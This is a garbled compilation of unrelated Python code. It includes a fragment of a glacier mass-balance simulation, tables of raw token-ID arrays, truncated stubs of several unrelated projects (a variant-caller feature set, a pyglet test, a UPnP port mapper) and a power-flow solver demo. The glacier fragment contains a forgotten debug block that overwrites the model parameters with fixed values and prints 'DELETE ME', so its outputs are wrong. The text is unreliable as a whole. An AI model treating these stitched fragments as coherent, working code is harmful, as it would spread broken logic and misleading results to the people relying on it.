glacier_gcm_tempstd = gcm_tempstd[glac,:]
glacier_gcm_lrgcm = gcm_lr[glac,:]
glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()
# ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
if input.hyps_data in ['oggm']:
glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
icethickness_initial = glac_oggm_df['h'].values
width_initial = glac_oggm_df['w'].values / 1e3
elev_bins = glac_oggm_df['z'].values
elif input.hyps_data in ['Huss', 'Farinotti']:
glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
width_initial = main_glac_width.iloc[glac,:].values.astype(float)
elev_bins = main_glac_hyps.columns.values.astype(int)
# if input.option_surfacetype_debris == 1:
# glacier_debrisfactor = main_glac_debrisfactor.iloc[glac,:].values.astype(float)
# # Empty datasets to record output
# annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
# year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
# year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
# np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# output_temp_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_prec_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_acc_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_refreeze_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_melt_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_frontalablation_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_massbaltotal_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_runoff_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_snowline_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_area_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_volume_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_ELA_glac_annual = np.zeros((year_values.shape[0], sim_iters))
# output_offglac_prec_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_refreeze_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_melt_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_snowpack_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_runoff_monthly = np.zeros((dates_table.shape[0], sim_iters))
if icethickness_initial.max() > 0:
if input.hindcast == 1:
glacier_gcm_prec = glacier_gcm_prec[::-1]
glacier_gcm_temp = glacier_gcm_temp[::-1]
glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]
# # get glacier number
# if glacier_rgi_table.O1Region >= 10:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][6:]
# else:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][7:]
if input.option_import_modelparams == 1:
ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
cn_subset = input.modelparams_colnames
modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
columns=ds_mp.mp.values)[cn_subset])
else:
modelparameters_all = (
pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
.reshape(1,-1), columns=input.modelparams_colnames))
# Set the number of iterations and determine every kth iteration to use for the ensemble
if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
sim_iters = input.sim_iters
# Select every kth iteration
mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
np.random.shuffle(mp_idx_start)
mp_idx_start = mp_idx_start[0]
mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
else:
sim_iters = 1
# Loop through model parameters
for n_iter in range(sim_iters):
if sim_iters == 1:
modelparameters = modelparameters_all.mean()
else:
mp_idx = mp_idx_all[n_iter]
modelparameters = modelparameters_all.iloc[mp_idx,:]
if debug:
print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
print('\n\nDELETE ME! Switch back model parameters\n\n')
modelparameters[2] = 5
modelparameters[7] = -5
print('model params:', modelparameters)
# run mass balance calculation
(glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
option_areaconstant=0, hindcast=input.hindcast,
debug=input.debug_mb, debug_refreeze=input.debug_refreeze))
if input.hindcast == 1:
glac_bin_temp = glac_bin_temp[:,::-1]
glac_bin_prec = glac_bin_prec[:,::-1]
glac_bin_acc = glac_bin_acc[:,::-1]
glac_bin_refreeze = glac_bin_refreeze[:,::-1]
glac_bin_snowpack = glac_bin_snowpack[:,::-1]
glac_bin_melt = glac_bin_melt[:,::-1]
glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
glac_bin_area_annual = glac_bin_area_annual[:,::-1]
glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
glac_bin_width_annual = glac_bin_width_annual[:,::-1]
glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
glac_wide_runoff = glac_wide_runoff[::-1]
glac_wide_snowline = glac_wide_snowline[::-1]
glac_wide_snowpack = glac_wide_snowpack[::-1]
glac_wide_area_annual = glac_wide_area_annual[::-1]
glac_wide_volume_annual = glac_wide_volume_annual[::-1]
glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
offglac_wide_prec = offglac_wide_prec[::-1]
offglac_wide_refreeze = offglac_wide_refreeze[::-1]
offglac_wide_melt = offglac_wide_melt[::-1]
offglac_wide_snowpack = offglac_wide_snowpack[::-1]
offglac_wide_runoff = offglac_wide_runoff[::-1]
# # RECORD PARAMETERS TO DATASET
# if input.output_package == 2:
# (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
# glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
# glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual) = (
# convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc,
# glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
# glac_bin_frontalablation, glac_bin_massbalclim_annual,
# glac_bin_area_annual, glac_bin_icethickness_annual))
#
# if debug:
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
# # Mean annual mass balance [mwea]
# # note: used annual shape - 1 because area and volume have "n+1 years" t0 account for initial
# # and final
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_area_annual.shape[0]-1))
# print(' mb_model [mwea]:', mb_mwea.round(3))
#
# # Record output to xarray dataset
# output_temp_glac_monthly[:, n_iter] = glac_wide_temp
# output_prec_glac_monthly[:, n_iter] = glac_wide_prec
# output_acc_glac_monthly[:, n_iter] = glac_wide_acc
# output_refreeze_glac_monthly[:, n_iter] = glac_wide_refreeze
# output_melt_glac_monthly[:, n_iter] = glac_wide_melt
# output_frontalablation_glac_monthly[:, n_iter] = glac_wide_frontalablation
# output_massbaltotal_glac_monthly[:, n_iter] = glac_wide_massbaltotal
# output_runoff_glac_monthly[:, n_iter] = glac_wide_runoff
# output_snowline_glac_monthly[:, n_iter] = glac_wide_snowline
# output_area_glac_annual[:, n_iter] = glac_wide_area_annual
# output_volume_glac_annual[:, n_iter] = glac_wide_volume_annual
# output_ELA_glac_annual[:, n_iter] = glac_wide_ELA_annual
# output_offglac_prec_monthly[:, n_iter] = offglac_wide_prec
# output_offglac_refreeze_monthly[:, n_iter] = offglac_wide_refreeze
# output_offglac_melt_monthly[:, n_iter] = offglac_wide_melt
# output_offglac_snowpack_monthly[:, n_iter] = offglac_wide_snowpack
# output_offglac_runoff_monthly[:, n_iter] = offglac_wide_runoff
#
# if debug:
# print(' years:', glac_wide_volume_annual.shape[0]-1)
# print(' vol start/end:', np.round(glac_wide_volume_annual[0],2), '/',
# np.round(glac_wide_volume_annual[-1],2))
# print(' area start/end:', np.round(glac_wide_area_annual[0],2), '/',
# np.round(glac_wide_area_annual[-1],2))
# print(' volume:', glac_wide_volume_annual)
# # print('glac runoff max:', np.round(glac_wide_runoff.max(),0),
# # 'glac prec max:', np.round(glac_wide_prec.max(),2),
# # 'glac refr max:', np.round(glac_wide_refreeze.max(),2),
# # 'offglac ref max:', np.round(offglac_wide_refreeze.max(),2))
#
# # ===== Export Results =====
# rgi_table_ds = pd.DataFrame(np.zeros((1,glacier_rgi_table.shape[0])), columns=glacier_rgi_table.index)
# rgi_table_ds.iloc[0,:] = glacier_rgi_table.values
# output_ds_all_stats, encoding = create_xrdataset(rgi_table_ds, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats['temp_glac_monthly'].values[0,:,:] = calc_stats_array(output_temp_glac_monthly)
# output_ds_all_stats['prec_glac_monthly'].values[0,:,:] = calc_stats_array(output_prec_glac_monthly)
# output_ds_all_stats['acc_glac_monthly'].values[0,:,:] = calc_stats_array(output_acc_glac_monthly)
# output_ds_all_stats['refreeze_glac_monthly'].values[0,:,:] = calc_stats_array(output_refreeze_glac_monthly)
# output_ds_all_stats['melt_glac_monthly'].values[0,:,:] = calc_stats_array(output_melt_glac_monthly)
# output_ds_all_stats['frontalablation_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_frontalablation_glac_monthly))
# output_ds_all_stats['massbaltotal_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_massbaltotal_glac_monthly))
# output_ds_all_stats['runoff_glac_monthly'].values[0,:,:] = calc_stats_array(output_runoff_glac_monthly)
# output_ds_all_stats['snowline_glac_monthly'].values[0,:,:] = calc_stats_array(output_snowline_glac_monthly)
# output_ds_all_stats['area_glac_annual'].values[0,:,:] = calc_stats_array(output_area_glac_annual)
# output_ds_all_stats['volume_glac_annual'].values[0,:,:] = calc_stats_array(output_volume_glac_annual)
# output_ds_all_stats['ELA_glac_annual'].values[0,:,:] = calc_stats_array(output_ELA_glac_annual)
# output_ds_all_stats['offglac_prec_monthly'].values[0,:,:] = calc_stats_array(output_offglac_prec_monthly)
# output_ds_all_stats['offglac_melt_monthly'].values[0,:,:] = calc_stats_array(output_offglac_melt_monthly)
# output_ds_all_stats['offglac_refreeze_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_refreeze_monthly))
# output_ds_all_stats['offglac_snowpack_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_snowpack_monthly))
# output_ds_all_stats['offglac_runoff_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_runoff_monthly))
#
# # Export statistics to netcdf
# if input.output_package == 2:
# output_sim_fp = input.output_sim_fp + gcm_name + '/'
# if gcm_name not in ['ERA-Interim', 'ERA5', 'COAWST']:
# output_sim_fp += rcp_scenario + '/'
# # Create filepath if it does not exist
# if os.path.exists(output_sim_fp) == False:
# os.makedirs(output_sim_fp)
# # Netcdf filename
# if gcm_name in ['ERA-Interim', 'ERA5', 'COAWST']:
# # Filename
# netcdf_fn = (glacier_str + '_' + gcm_name + '_c' + str(input.option_calibration) + '_ba' +
# str(input.option_bias_adjustment) + '_' + str(sim_iters) + 'sets' + '_' +
# str(input.gcm_startyear) + '_' + str(input.gcm_endyear) + '.nc')
# else:
# netcdf_fn = (glacier_str + '_' + gcm_name + '_' + rcp_scenario + '_c' +
# str(input.option_calibration) + '_ba' + str(input.option_bias_adjustment) + '_' +
# str(sim_iters) + 'sets' + '_' + str(input.gcm_startyear) + '_' + str(input.gcm_endyear)
# + '.nc')
# if input.option_synthetic_sim==1:
# netcdf_fn = (netcdf_fn.split('--')[0] + '_T' + str(input.synthetic_temp_adjust) + '_P' +
# str(input.synthetic_prec_factor) + '--' + netcdf_fn.split('--')[1])
# # Export netcdf
# output_ds_all_stats.to_netcdf(output_sim_fp + netcdf_fn, encoding=encoding)
#
# # Close datasets
# output_ds_all_stats.close()
#
#
# if debug_spc:
# os.remove(debug_fp + debug_rgiid_fn)
# Global variables for Spyder development
if args.option_parallels == 0:
global main_vars
main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
time_start = time.time()
parser = getparser()
args = parser.parse_args()
if args.debug == 1:
debug = True
else:
debug = False
# RGI glacier number
if args.rgi_glac_number_fn is not None:
with open(args.rgi_glac_number_fn, 'rb') as f:
glac_no = pickle.load(f)
elif input.glac_no is not None:
glac_no = input.glac_no
else:
main_glac_rgi_all = modelsetup.selectglaciersrgitable(
rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
rgi_glac_number=input.rgi_glac_number)
glac_no = list(main_glac_rgi_all['rgino_str'].values)
# Regions
regions_str = 'R'
for region in sorted(set([x.split('.')[0] for x in glac_no])):
regions_str += str(region)
# Number of cores for parallel processing
if args.option_parallels != 0:
num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
else:
num_cores = 1
# Glacier number lists to pass for parallel processing
glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)
# Read GCM names from argument parser
gcm_name = args.gcm_list_fn
if args.gcm_name is not None:
gcm_list = [args.gcm_name]
rcp_scenario = args.rcp
elif args.gcm_list_fn == input.ref_gcm_name:
gcm_list = [input.ref_gcm_name]
rcp_scenario = args.rcp
else:
with open(args.gcm_list_fn, 'r') as gcm_fn:
gcm_list = gcm_fn.read().splitlines()
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
print('Found %d gcms to process'%(len(gcm_list)))
# Loop through all GCMs
for gcm_name in gcm_list:
if args.rcp is None:
print('Processing:', gcm_name)
else:
print('Processing:', gcm_name, rcp_scenario)
# Pack variables for multiprocessing
list_packed_vars = []
for count, glac_no_lst in enumerate(glac_no_lsts):
list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])
# Parallel processing
if args.option_parallels != 0:
print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
with multiprocessing.Pool(args.num_simultaneous_processes) as p:
p.map(main,list_packed_vars)
# If not in parallel, then only should be one loop
else:
# Loop through the chunks and export bias adjustments
for n in range(len(list_packed_vars)):
main(list_packed_vars[n])
print('Total processing time:', time.time()-time_start, 's')
#%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
# Place local variables in variable explorer
if args.option_parallels == 0:
main_vars_list = list(main_vars.keys())
gcm_name = main_vars['gcm_name']
main_glac_rgi = main_vars['main_glac_rgi']
# main_glac_hyps = main_vars['main_glac_hyps']
# main_glac_icethickness = main_vars['main_glac_icethickness']
# main_glac_width = main_vars['main_glac_width']
dates_table = main_vars['dates_table']
if input.option_synthetic_sim == 1:
dates_table_synthetic = main_vars['dates_table_synthetic']
gcm_temp_tile = main_vars['gcm_temp_tile']
gcm_prec_tile = main_vars['gcm_prec_tile']
gcm_lr_tile = main_vars['gcm_lr_tile']
gcm_temp = main_vars['gcm_temp']
gcm_tempstd = main_vars['gcm_tempstd']
gcm_prec = main_vars['gcm_prec']
gcm_elev = main_vars['gcm_elev']
gcm_lr = main_vars['gcm_lr']
gcm_temp_adj = main_vars['gcm_temp_adj']
gcm_prec_adj = main_vars['gcm_prec_adj']
gcm_elev_adj = main_vars['gcm_elev_adj']
gcm_temp_lrglac = main_vars['gcm_lr']
# output_ds_all_stats = main_vars['output_ds_all_stats']
# modelparameters = main_vars['modelparameters']
glacier_rgi_table = main_vars['glacier_rgi_table']
glacier_str = main_vars['glacier_str']
glac_oggm_df = main_vars['glac_oggm_df']
glacier_gcm_temp = main_vars['glacier_gcm_temp']
glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
glacier_gcm_prec = main_vars['glacier_gcm_prec']
glacier_gcm_elev = main_vars['glacier_gcm_elev']
glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
glacier_gcm_lrglac = glacier_gcm_lrgcm
glacier_area_initial = main_vars['glacier_area_initial']
icethickness_initial = main_vars['icethickness_initial']
width_initial = main_vars['width_initial']
elev_bins = main_vars['elev_bins']
glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
glac_bin_area_annual = main_vars['glac_bin_area_annual']
glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
glac_bin_melt = main_vars['glac_bin_melt']
glac_bin_acc = main_vars['glac_bin_acc']
glac_bin_refreeze = main_vars['glac_bin_refreeze']
glac_bin_snowpack = main_vars['glac_bin_snowpack']
glac_bin_temp = main_vars['glac_bin_temp']
glac_bin_prec = main_vars['glac_bin_prec']
glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
glac_wide_area_annual = main_vars['glac_wide_area_annual']
glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
glac_wide_runoff = main_vars['glac_wide_runoff']
# glac_wide_prec = main_vars['glac_wide_prec']
# glac_wide_refreeze = main_vars['glac_wide_refreeze']
modelparameters_all = main_vars['modelparameters_all']
sim_iters = main_vars['sim_iters']
| [
37811,
10987,
257,
2746,
18640,
526,
15931,
201,
198,
2,
15161,
4258,
1366,
318,
18802,
12,
9492,
320,
26,
11986,
16477,
4061,
20,
416,
31577,
257,
29472,
284,
262,
4578,
25,
201,
198,
2,
220,
220,
220,
357,
21575,
1627,
8,
21015,
1... | 1.921429 | 34,020 |
# coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
translate = Translate()
| [
2,
19617,
28,
40477,
23,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
11,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
198,
198,
6738,
264,
404,
417,
62,
18170,
13,
2777,
291,
8463,
541,
1330,
599,
291,
8463,
... | 3.223881 | 67 |
from .basemodel import BaseModel
from .types.field_definition import FieldDefinition
from typing import List, Dict
| [
6738,
764,
12093,
368,
375,
417,
1330,
7308,
17633,
198,
6738,
764,
19199,
13,
3245,
62,
46758,
1330,
7663,
36621,
198,
6738,
19720,
1330,
7343,
11,
360,
713,
628
] | 4 | 29 |
#
# Strelka - Small Variant Caller
# Copyright (c) 2009-2018 Illumina, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
import abc
class FeatureSet(object):
""" VCF paired Feature set for somatic comparison """
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def collect(self, vcfname):
""" Return a data frame with features collected from
the given VCF, tagged by given type """
pass
@abc.abstractmethod
def trainingfeatures(self):
""" Return a list of columns that are features to use for EVS model training """
pass
sets = {}
@staticmethod
@staticmethod
import SomaticSNV # noqa
import SomaticIndel # noqa
import PosAndAlleles # noqa
| [
2,
198,
2,
520,
2411,
4914,
532,
10452,
38215,
10244,
198,
2,
15069,
357,
66,
8,
3717,
12,
7908,
39256,
1437,
11,
3457,
13,
198,
2,
198,
2,
770,
1430,
318,
1479,
3788,
25,
345,
460,
17678,
4163,
340,
290,
14,
273,
13096,
198,
2,... | 3.213075 | 413 |
import math
import unittest
from simulation.utils.geometry.frame import Frame, validate_and_maintain_frames
from simulation.utils.geometry.transform import Transform
from simulation.utils.geometry.vector import Vector
if __name__ == "__main__":
unittest.main()
| [
11748,
10688,
198,
11748,
555,
715,
395,
198,
198,
6738,
18640,
13,
26791,
13,
469,
15748,
13,
14535,
1330,
25184,
11,
26571,
62,
392,
62,
76,
32725,
62,
37805,
198,
6738,
18640,
13,
26791,
13,
469,
15748,
13,
35636,
1330,
26981,
198,... | 3.493506 | 77 |
#!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'
import unittest
from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname
icon_file = join(dirname(__file__), 'icon1.png')
if __name__ == '__main__':
unittest.main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
7061,
6,
14402,
326,
4324,
7196,
460,
307,
900,
13,
198,
198,
3109,
7254,
9172,
25,
198,
220,
220,
220,
1881,
4324,
481,
307,
4721,
13,
220,
632,
481,
423,
281,
7196,
27561,
2... | 2.693694 | 222 |
from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
"""it takes an object and returns true or false if the object is touched at screen (x, y) and the (x,y, z) position of that touch if returned"""
bl_idname = 'LNRaycastObjectNode'
bl_label = 'Raycast Object'
arm_section = 'props'
arm_version = 1
| [
6738,
3211,
13,
6404,
291,
17440,
13,
1670,
62,
77,
4147,
1330,
1635,
198,
198,
4871,
7760,
2701,
10267,
19667,
7,
26560,
11187,
291,
27660,
19667,
2599,
198,
220,
220,
220,
37227,
270,
2753,
281,
2134,
290,
5860,
2081,
393,
3991,
611... | 2.876033 | 121 |
import miniupnpc
import random
import itertools
import ipaddress
if __name__ == "__main__":
pm = port_manager()
print(pm.discover())
(result, port) = pm.mapport()
print(result, port)
print(pm.used_ports())
print(pm.unmapport(int(port)))
print(pm.used_ports())
print(pm.unmap_ports(closeall=True))
| [
11748,
9927,
929,
77,
14751,
198,
11748,
4738,
198,
11748,
340,
861,
10141,
198,
11748,
20966,
21975,
628,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
9114,
796,
2493,
62,
37153,
3419,
198,
220,
2... | 2.433824 | 136 |
from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
1334,
62,
30604,
1330,
5009,
1039,
198,
198,
6738,
764,
27530,
1330,
9097,
198,
6738,
764,
46911,
11341,
1330,
9097,
32634,
7509,
628
] | 4.212121 | 33 |
from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
| [
6738,
11192,
273,
11125,
13,
6122,
292,
1330,
4981,
198,
6738,
11192,
273,
11125,
13,
6122,
292,
13,
13345,
10146,
1330,
7443,
198,
198,
6738,
6670,
13,
27160,
13,
18780,
1040,
62,
27160,
1330,
6060,
11395,
6030,
628,
198
] | 3.666667 | 39 |
#coding = utf-8
'''
Here is a demo of showing how to slove powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'
simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()
powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator
data_type = 'D' # if you want to set or get doubule data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution
# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')
# if you want to solve powerflow step by step to get the solution process,
# you can set MAX ITERATION as 1, and Flat start logic as false
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first slove it with flat start enable
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
simulator.solve_powerflow('NR')
simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents
# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)
# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
bus_name = simulator.get_bus_data(bus, 'S', 'Name')
voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
print(bus, bus_name, voltage, angle)
# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicate all generators will be returned
for generator in generators:
P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
print(generator, P, Q)
# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicate all loads will be returned
for load in loads:
P = simulator.get_load_data(load, 'D', 'P_MW')
Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
print(load, P, Q)
# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicate all lines will be returned
for line in lines:
bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
